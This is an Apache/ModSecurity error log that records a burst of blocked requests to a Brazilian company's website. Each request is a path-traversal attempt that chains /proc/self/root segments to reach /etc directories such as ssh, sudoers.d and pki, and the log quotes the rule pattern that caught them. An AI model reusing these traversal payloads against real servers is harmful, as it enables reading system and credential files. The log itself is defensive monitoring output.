[Thu Mar 19 05:30:52.151283 2026] [:error] [pid 17887:tid 140411548894976] [client 74.7.243.128:45844] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/virc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu0PAkwaGbbGflqUZCMUAAAANc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:30:53.742328 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.243.128:43006] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu0PeoXxyEfFpUF8f_l_AAAAUk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:30:55.095087 2026] [:error] [pid 27403:tid 140411691570944] [client 74.7.243.128:43018] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu0PxkFeYa1D6dYQnDEegAAAcY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:30:58.953539 2026] [:error] [pid 27403:tid 140411574073088] [client 74.7.243.128:43032] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu0QRkFeYa1D6dYQnDEfwAAAdQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:31:00.282090 2026] [:error] [pid 17887:tid 140411641214720] [client 74.7.243.128:53368] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu0RAkwaGbbGflqUZCMVQAAAMw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:31:01.595293 2026] [:error] [pid 14269:tid 140411548894976] [client 74.7.243.128:53380] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu0RQbLMZ6AikZjR9UyywAAABc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:31:01.806084 2026] [:error] [pid 14269:tid 140411557287680] [client 74.7.243.128:53380] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu0RQbLMZ6AikZjR9UyzQAAABY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:31:04.596206 2026] [:error] [pid 17887:tid 140411607643904] [client 74.7.243.128:53384] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu0SAkwaGbbGflqUZCMWgAAANA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:31:07.685499 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.243.128:53386] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu0Sta6ubjKNq_cu4YYqQAAA0c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:31:10.697179 2026] [:error] [pid 30077:tid 140411708356352] [client 74.7.243.128:48298] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu0Tvu8EFLIOrSqIpt03wAAAkQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:31:14.435213 2026] [:error] [pid 27293:tid 140411565680384] [client 74.7.243.128:48306] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu0Uv-YZRR_7pZ7nDJjYwAAA9U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:31:15.754689 2026] [:error] [pid 27403:tid 140411590858496] [client 74.7.243.128:48314] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu0UxkFeYa1D6dYQnDEjQAAAdI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:31:16.020644 2026] [:error] [pid 27403:tid 140411741927168] [client 74.7.243.128:48314] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu0VBkFeYa1D6dYQnDEjgAAAcA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:31:17.357137 2026] [:error] [pid 15826:tid 140411658000128] [client 74.7.243.128:48318] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu0VeoXxyEfFpUF8f_mGwAAAUo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:31:18.665093 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.243.128:48322] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu0VuoXxyEfFpUF8f_mHwAAAU0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:31:22.963221 2026] [:error] [pid 27293:tid 140411666392832] [client 74.7.243.128:35754] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu0Wv-YZRR_7pZ7nDJjaAAAA8k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:31:24.415769 2026] [:error] [pid 31803:tid 140411649607424] [client 74.7.243.128:35766] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu0XOyqAr6etmhZHNo5NAAAAEs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:31:27.987128 2026] [:error] [pid 17653:tid 140411632822016] [client 74.7.243.128:35780] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu0Xsdf6f5d65gmYZRJSwAAAs0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:31:29.363244 2026] [:error] [pid 30077:tid 140411716749056] [client 74.7.243.128:35784] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu0Yfu8EFLIOrSqIpt06QAAAkM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:31:31.782603 2026] [:error] [pid 30077:tid 140411683178240] [client 74.7.243.128:57782] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu0Y_u8EFLIOrSqIpt07AAAAkc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:31:33.122689 2026] [:error] [pid 30077:tid 140411708356352] [client 74.7.243.128:57784] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu0Zfu8EFLIOrSqIpt07wAAAkQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
